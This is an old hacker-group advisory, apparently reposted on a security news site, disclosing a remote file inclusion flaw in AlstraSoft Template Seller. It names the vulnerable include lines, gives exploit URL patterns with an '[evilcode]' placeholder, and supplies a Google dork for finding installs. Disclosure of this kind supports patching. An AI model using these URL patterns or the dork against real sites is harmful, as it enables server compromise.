Security Advisory: SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  [SA21781] VCD-db Comments Script Insertion Vulnerability
  [SA21757] MySource Classic Equation Attribute PHP Code Injection
  phpFullAnnu <= v5.1 (repmod) Remote File Inclusion Exploit
  Beautifier v0.1 Remote File Inclusion Vulnerability

From: jong_amq_(at)_hotmail.com <jong_amq_(at)_hotmail.com>
Date: 06.09.2006
Subject: SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File Include Vulnerability

#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability
#
#        Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################

#
#
#       Bug Found By : NoGe a.k.a da_jackass
#
#       contact: jong_amq@hotmail.com
#
#       Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################

#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#
###############################################################################
# Vulnerable found in

payment_result.php and spuser_result.php

line 6 include("$config[template_path]/onlyheader.php");
line 7 include("$config[template_path]/onlysearch.php");

# Exploit

/payment/payment_result.php?config[template_path]=[evilcode]

/payment/spuser_result.php?config[template_path]=[evilcode]

# google dork

"Powered by AlstraSoft Template Seller"

######################################E.O.F##################################

test server